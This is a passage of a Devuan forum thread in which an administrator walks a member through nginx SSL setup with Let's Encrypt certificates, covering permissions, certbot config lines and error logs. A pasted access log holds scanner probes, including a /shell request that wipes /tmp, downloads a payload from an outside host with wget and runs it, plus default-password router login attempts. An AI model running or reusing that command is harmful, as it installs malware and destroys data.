The officially official Devuan Forum!

You are not logged in.

#76 2023-01-02 04:04:26

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

root@devuan1:/etc# runuser -u www-data cat /etc/letsencrypt/live/realupnow.com/fullchain.pem > /dev/null
cat: /etc/letsencrypt/live/realupnow.com/fullchain.pem: Permission denied

Offline

#77 2023-01-02 04:05:35

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

root@devuan1:/etc# chgrp ssl-cert /etc/letsencrypt/{live,archive}
root@devuan1:/etc# adduser www-data ssl-cert
Adding user `www-data' to group `ssl-cert' ...
Adding user www-data to group ssl-cert
Done.

Offline

#78 2023-01-02 04:07:38

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Hmm please show output of

# namei -om /etc/letsencrypt/live/realupnow.com/fullchain.pem

Offline

#79 2023-01-02 04:10:16

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

root@devuan1:/etc# namei -om /etc/letsencrypt/live/realupnow.com/fullchain.pem
f: /etc/letsencrypt/live/realupnow.com/fullchain.pem
 drwxr-xr-x root root     /
 drwxr-xr-x root root     etc
 drwxr-xr-x root root     letsencrypt
 drwx------ root ssl-cert live
 drwxr-xr-x root root     realupnow.com
 lrwxrwxrwx root root     fullchain.pem -> ../../archive/realupnow.com/fullchain1.pem
   drwx------ root ssl-cert ..
   drwxr-xr-x root root     ..
   drwx------ root ssl-cert archive
   drwxr-xr-x root root     realupnow.com
   -rw-r--r-- root ssl-cert fullchain1.pem
root@devuan1:/etc#

Offline

#80 2023-01-02 04:15:04

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Ok; I had forgotten... you need to set up group access to live and archive:

# chmod g+rx /etc/letsencrypt/{live,archive}

Offline

#81 2023-01-02 04:17:14

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

root@devuan1:/etc# chmod g+rx /etc/letsencrypt/{live,archive}
root@devuan1:/etc# namei -om /etc/letsencrypt/live/realupnow.com/fullchain.pem
f: /etc/letsencrypt/live/realupnow.com/fullchain.pem
 drwxr-xr-x root root     /
 drwxr-xr-x root root     etc
 drwxr-xr-x root root     letsencrypt
 drwxr-x--- root ssl-cert live
 drwxr-xr-x root root     realupnow.com
 lrwxrwxrwx root root     fullchain.pem -> ../../archive/realupnow.com/fullchain1.pem
   drwxr-x--- root ssl-cert ..
   drwxr-xr-x root root     ..
   drwxr-x--- root ssl-cert archive
   drwxr-xr-x root root     realupnow.com
   -rw-r--r-- root ssl-cert fullchain1.pem
root@devuan1:/etc# 

Offline

#82 2023-01-02 04:18:29

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Looks fine.

The final hurdle is to configure the ssl function of nginx and that's virtually a new ocean of possibilities. Though it typically reduces down into having two files: /etc/ssl/certs/dhparam.pem and  /etc/nginx/snippets/ssl-params.conf.
You might have those already.

Plus that the service configuration should includes the second, typically near the ssl_certificate directive.

include snippets/ssl-params.conf ;

Offline

#83 2023-01-02 04:21:38

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

server {
    listen 80 default_server;
#    listen [::]:80 default_server;
    root /var/www/html;
    server_name  realupnow.com www.realupnow.com;

	location / {
		try_files $uri $uri/ =404;
	}

	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		include snippets/ssl-params.conf;
		fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
	}

    listen 443 ssl; # managed by Certbot

    # RSA certificate
    ssl_certificate /etc/letsencrypt/live/realupnow.com/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/realupnow.com/privkey.pem; # managed by Certbot

    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot

    # Redirect non-https traffic to https
    if ($scheme != "https") {
        return 301 https://$host$request_uri;
    } # managed by Certbot
}

Offline

#84 2023-01-02 04:26:18

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

These two don't exist /etc/ssl/certs/dhparam.pem and /etc/nginx/snippets/ssl-params.conf.

At least not in those locations.

Shouldn't certbot have created them?

I'm in zombie-mode now as it's 11:25pm and it was a short night last night.

I probably should return to this in the morning with some rest and some coffee ...

Sure appreciate you hanging in with me on this.

I also hope that others will benefit from the thread.

Offline

#85 2023-01-02 04:27:33

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

Did I insert

include snippets/ssl-params.conf ;

in the correct location in realupnow.com.conf?

Offline

#86 2023-01-02 04:48:38

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

mmm no the ssl-params.conf needs to be included outside of the location block... But it also seems you have at some time let certbot mess with the configuration and it has then given you a mix of stuff you may and may not want.

It's ok to use /etc/letsencrypt/options-ssl-nginx.conf instead of the currently non-existing /etc/nginx/snippets/ssl-params.conf although you of course will need to review that instead.

Just make sure to remove the "# managed by certbot" comment on that include line.

And in the future, do not ever, never, never run certbot with --nginx argument again as it will then want to mess with the configuration again. certbot might also have dropped a cron action (/etc/cron.d/certbot) to "do helpful things" that you may and might not want. That's another thing to review and clean up. (sometimes I wish that those "we must do it all" hats were much smaller)

Further certbot added stuff at the bottom of that service block, which amounts to enforcing a redirect response when the incoming request is not https. That's an ok function, but again I think you should remove the "# managed by certbot" comment.

So: what's in /etc/letsencrypt/options-ssl-nginx.conf ?

EDIT: I meant that file of course.

Offline

#87 2023-01-02 13:56:41

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

# This file contains important security parameters. If you modify this file
# manually, Certbot will be unable to automatically provide future security
# updates. Instead, Certbot will print and log an error message with a path to
# the up-to-date file that you will need to refer to when manually updating
# this file.

ssl_session_cache shared:le_nginx_SSL:10m;
ssl_session_timeout 1440m;
ssl_session_tickets off;

ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;

ssl_ciphers "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4";

I guessed that I may not want to broadcast the contents of ssl_cyphers.

Last edited by dcolburn (2023-01-02 13:57:41)

Offline

#88 2023-01-02 14:38:41

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

I changed the Group setting of /etc/letsencrypt/live/realupnow.com/privkey.pem to ssl-cert and that error went away.

sudo nginx -t kept erroring re. "manage" so I added a "#" in front of all of them and the error went away.

Also ran a nginx restart.

Offline

#89 2023-01-02 14:40:56

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

Nothing responds now, http or https ...

I tried commenting out the https redirect block at the bottom and that didn't help.

##
# Virtual Host configuration for realupnow.com
#
# Be sure to symlink that to sites-enabled/ to enable it.
# sudo ln -s /etc/nginx/sites-available/realupnow.com /etc/nginx/sites-enabled/realupnow.com
#

server {
    listen 80 default_server;
#    listen [::]:80 default_server;
    root /var/www;
    server_name  realupnow.com www.realupnow.com;

	location / {
		try_files $uri $uri/ =404;
	}

	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
	}

    listen 443 ssl;  # managed by Certbot

    # RSA certificate
    ssl_certificate /etc/letsencrypt/live/realupnow.com/fullchain.pem;  # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/realupnow.com/privkey.pem;  # managed by Certbot

    include /etc/letsencrypt/options-ssl-nginx.conf;  # managed by Certbot

    # Redirect non-https traffic to https
#    if ($scheme != "https") {
#        return 301 https://$host$request_uri;
#    } # managed by Certbot
}

Last edited by dcolburn (2023-01-02 14:55:03)

Offline

#90 2023-01-02 22:38:06

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Firstly, it appears nginx is not running.

Does pgrep -a nginx say that it is?

Did you check the error log?

Offline

#91 2023-01-02 23:04:45

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

root@devuan1:/etc/letsencrypt/live/realupnow.com# pgrep -a nginx
25911 nginx: master process /usr/sbin/nginx
25912 nginx: worker process
25913 nginx: worker process
25914 nginx: worker process
25916 nginx: worker process
root@devuan1:/etc/letsencrypt/live/realupnow.com# 

Offline

#92 2023-01-02 23:09:59

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

The is the letsencrypt.log ...

2023-01-02 18:07:48,237:DEBUG:certbot._internal.main:certbot version: 1.12.0
2023-01-02 18:07:48,237:DEBUG:certbot._internal.main:Location of certbot entry point: /usr/bin/certbot
2023-01-02 18:07:48,237:DEBUG:certbot._internal.main:Arguments: ['-q']
2023-01-02 18:07:48,237:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#nginx,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2023-01-02 18:07:48,243:DEBUG:certbot._internal.log:Root logging level set at 30
2023-01-02 18:07:48,243:INFO:certbot._internal.log:Saving debug log to /var/log/letsencrypt/letsencrypt.log
2023-01-02 18:07:48,244:DEBUG:certbot.display.util:Notifying user: Processing /etc/letsencrypt/renewal/realupnow.com.conf
2023-01-02 18:07:48,248:DEBUG:certbot._internal.plugins.selection:Requested authenticator <certbot._internal.cli.cli_utils._Default object at 0x7f4bb0ce76d0> and installer <certbot._internal.cli.cli_utils._Default object at 0x7f4bb0ce76d0>
2023-01-02 18:07:48,253:DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): r3.o.lencr.org:80
2023-01-02 18:07:48,401:DEBUG:urllib3.connectionpool:http://r3.o.lencr.org:80 "POST / HTTP/1.1" 200 503
2023-01-02 18:07:48,404:DEBUG:certbot.ocsp:OCSP response for certificate /etc/letsencrypt/archive/realupnow.com/cert1.pem is signed by the certificate's issuer.
2023-01-02 18:07:48,409:DEBUG:certbot.ocsp:OCSP certificate status for /etc/letsencrypt/archive/realupnow.com/cert1.pem is: OCSPCertStatus.GOOD
2023-01-02 18:07:48,441:INFO:certbot._internal.renewal:Cert not yet due for renewal
2023-01-02 18:07:48,442:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2023-01-02 18:07:48,442:DEBUG:certbot.display.util:Notifying user: 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2023-01-02 18:07:48,442:DEBUG:certbot.display.util:Notifying user: The following certificates are not due for renewal yet:
2023-01-02 18:07:48,442:DEBUG:certbot.display.util:Notifying user:   /etc/letsencrypt/live/realupnow.com/fullchain.pem expires on 2023-04-01 (skipped)
2023-01-02 18:07:48,442:DEBUG:certbot.display.util:Notifying user: No renewals were attempted.
2023-01-02 18:07:48,442:DEBUG:certbot.display.util:Notifying user: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2023-01-02 18:07:48,442:DEBUG:certbot._internal.renewal:no renewal failures

Last edited by dcolburn (2023-01-02 23:51:22)

Offline

#93 2023-01-02 23:28:57

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

ralph.ronnquist wrote:

Firstly, it appears nginx is not running.

Does pgrep -a nginx say that it is?

It appears, to me, to say that it's running.

I ran nginx -t each time I made a change and when that was good I restarted nginx - without error.

ralph.ronnquist wrote:

Did you check the error log?

It's hard to interpret some of the log output but I can't spot any problems.

Its a there a log, other than letsencrypt.log, that I should be looking at, please?

Last edited by dcolburn (2023-01-02 23:51:54)

Offline

#94 2023-01-03 00:09:09

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Hmm nginx is running but not serving pages...

Where did those "managed by certbot" lines come from? That configuration file of post #89 is a bit different from the one you showed at post #57 and it confuses me... where did "default_server" comd from, and where did that ssl setup come from? And why is it "root /var/www" ? Is that really the right file? Did you (also:)) get tired yesterday?

The nginx log files are still in /var/log/nginx where it has error.log and access.log

Offline

#95 2023-01-03 01:10:23

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

access.log (from today) looks OK to me - am I missing anything?

159.203.192.16 - - [02/Jan/2023:00:14:13 -0500] "GET / HTTP/1.1" 200 155 "-" "Mozilla/5.0 zgrab/0.x"
95.137.202.53 - - [02/Jan/2023:00:28:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"
183.136.225.32 - - [02/Jan/2023:01:22:05 -0500] "GET / HTTP/1.1" 200 180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [02/Jan/2023:01:27:44 -0500] "GET / HTTP/1.1" 200 155 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Jan/2023:01:27:44 -0500] "GET /favicon.ico HTTP/1.1" 404 188 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Jan/2023:01:27:45 -0500] "GET /robots.txt HTTP/1.1" 404 188 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
51.255.62.10 - - [02/Jan/2023:02:43:17 -0500] "GET / HTTP/1.1" 200 180 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
216.245.215.122 - - [02/Jan/2023:02:59:00 -0500] "GET /wp-login.php HTTP/1.1" 404 125 "-" "Mozilla/5.0 (Windows NT 10; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
194.55.186.216 - - [02/Jan/2023:03:46:19 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 125 "http://66.172.90.106:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
194.55.186.216 - - [02/Jan/2023:03:46:19 -0500] "" 400 0 "-" "-"
5.188.210.227 - - [02/Jan/2023:03:48:56 -0500] "\x05\x01\x00" 400 157 "-" "-"
5.188.210.227 - - [02/Jan/2023:03:50:31 -0500] "\x04\x01\x00P\x05\xBC\xD2\xE3\x00" 400 157 "-" "-"
5.188.210.227 - - [02/Jan/2023:03:51:24 -0500] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 188 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.188.62.174 - - [02/Jan/2023:03:55:51 -0500] "GET / HTTP/1.1" 200 155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4895.86 Safari/537.36"
205.185.118.237 - - [02/Jan/2023:04:18:27 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 125 "http://66.172.90.106:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
205.185.118.237 - - [02/Jan/2023:04:18:27 -0500] "" 400 0 "-" "-"
125.122.236.160 - - [02/Jan/2023:04:43:47 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 153 "-" "-"
92.118.39.29 - - [02/Jan/2023:06:24:22 -0500] "GET / HTTP/1.1" 200 180 "-" "-"
59.93.26.27 - - [02/Jan/2023:06:40:57 -0500] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 153 "-" "-"
37.143.129.227 - - [02/Jan/2023:06:51:08 -0500] "GET http://ipv4.games/claim?name=sheesh.rip HTTP/1.1" 404 188 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36"
205.185.118.237 - - [02/Jan/2023:07:43:15 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 125 "http://66.172.90.106:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
205.185.118.237 - - [02/Jan/2023:07:43:15 -0500] "" 400 0 "-" "-"

Offline

#96 2023-01-03 01:11:45

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

error.log looks more interesting ...

2023/01/02 08:59:00 [emerg] 24998#24998: open() "/etc/nginx/snippets/ssl-params.conf" failed (2: No such file or directory) in /etc/nginx/sites-enabled/realupnow.com.conf:36
2023/01/02 09:09:06 [emerg] 25064#25064: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:43
2023/01/02 09:11:25 [emerg] 25066#25066: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:43
2023/01/02 09:12:00 [emerg] 25068#25068: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:27
2023/01/02 09:19:38 [emerg] 25088#25088: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:27
2023/01/02 09:23:33 [emerg] 25118#25118: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:27
2023/01/02 09:28:19 [emerg] 25147#25147: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:27
2023/01/02 09:29:27 [emerg] 25152#25152: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:30:11 [emerg] 25175#25175: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:30:31 [emerg] 25177#25177: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:30:46 [emerg] 25179#25179: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:31:49 [emerg] 25182#25182: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:34:08 [info] 25190#25190: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 09:37:59 [info] 25206#25206: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 09:43:00 [emerg] 25281#25281: unknown directive "managed" in /etc/nginx/sites-enabled/realupnow.com.conf:26
2023/01/02 09:47:48 [info] 25287#25287: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 09:48:18 [info] 25300#25300: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 09:50:17 [info] 25317#25317: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 09:50:20 [info] 25329#25329: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 10:10:19 [error] 25335#25335: *1 directory index of "/var/www/" is forbidden, client: 45.93.16.71, server: realupnow.com, request: "GET / HTTP/1.1", host: "66.172.90.106"
2023/01/02 10:51:16 [error] 25335#25335: *2 directory index of "/var/www/" is forbidden, client: 3.252.151.222, server: realupnow.com, request: "HEAD / HTTP/1.1", host: "bullnet1.asuscomm.com", referrer: "https://www.netcraft.com/survey/"
2023/01/02 11:37:36 [emerg] 25679#25679: "ssl_session_cache" directive is not allowed here in /etc/letsencrypt/options-ssl-nginx.conf:7
2023/01/02 11:38:31 [info] 25681#25681: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 11:41:40 [info] 25732#25732: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 11:41:46 [info] 25744#25744: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 12:31:49 [info] 25894#25894: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 12:31:51 [info] 25906#25906: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 12:35:29 [emerg] 25927#25927: no "ssl_certificate_key" is defined for certificate "/etc/letsencrypt/live/realupnow.com/fullchain.pem"

Last edited by dcolburn (2023-01-03 01:13:01)

Offline

#97 2023-01-03 01:15:05

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

Yesterday 23:48:38 you wrote:

Just make sure to remove the "# managed by certbot" comment on that include line.

Just remembered that I tried this and it caused an error - it doesn't exist include snippets/ssl-params.conf;

... and ...

Further certbot added stuff at the bottom of that service block, which amounts to enforcing a redirect response when the incoming request is not https. That's an ok function, but again I think you should remove the "# managed by certbot" comment.

I tried those things and just got errors, or no response at all, so I restored them. At least I thought I did ...

Default server came from here:

https://www.nginx.com/blog/using-free-ssltls-certificates-from-lets-encrypt-with-nginx/

Last edited by dcolburn (2023-01-03 01:25:47)

Offline

#98 2023-01-03 01:48:34

ralph.ronnquist
Administrator
From: Battery Point, Tasmania, AUS
Registered: 2016-11-30
Posts: 1,148  

Re: [SOLVED] Good nginx ssl instructions

Suggestions:

1. remove the commented listen line (line 10).
2. Restore root /var/www/realupnow.com;
3. lift up the listen 443 ssl; to be new line 10, and
4. remove the # managed by Certbot junk from all lines.

Having default_server or not doesn't matter with a single configuration.

Next, forget about ssl-params.conf and instead use /etc/letsencrypt/options-ssl-nginx.conf, which is a gift from certbot (and there's no harm in publicizing ssl_ciphers).

The question is why there is a complaint about it in the log; try with commenting out that line, and restart nginx.

Offline

#99 2023-01-03 02:10:55

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

Done.

No connections, http or https.

error.log

2023/01/02 20:24:10 [emerg] 27474#27474: open() "/etc/nginx/snippets/ssl-params.conf" failed (2: No such file or directory) in /etc/nginx/sites-enabled/realupnow.com.conf:20
2023/01/02 21:04:16 [info] 27598#27598: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65
2023/01/02 21:04:22 [info] 27610#27610: Using 131072KiB of shared memory for nchan in /etc/nginx/nginx.conf:65

Last edited by dcolburn (2023-01-03 02:17:41)

Offline

#100 2023-01-03 02:11:57

dcolburn
Member
Registered: 2022-11-02
Posts: 280  

Re: [SOLVED] Good nginx ssl instructions

##
# Virtual Host configuration for realupnow.com
#
# Be sure to symlink this to sites-enabled/ to enable it.
# sudo ln -s /etc/nginx/sites-available/realupnow.com /etc/nginx/sites-enabled/realupnow.com
#

server {
    listen 80;
    listen 443 ssl;
    root /var/www/realupnow.com;
    server_name  realupnow.com www.realupnow.com;

	location / {
		try_files $uri $uri/ =404;
	}

	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
	}

    # RSA certificate
    ssl_certificate /etc/letsencrypt/live/realupnow.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/realupnow.com/privkey.pem;

	include /etc/letsencrypt/options-ssl-nginx.conf;

    # Redirect non-https traffic to https
    if ($scheme != "https") {
        return 301 https://$host$request_uri;
    }
}

Offline

Board footer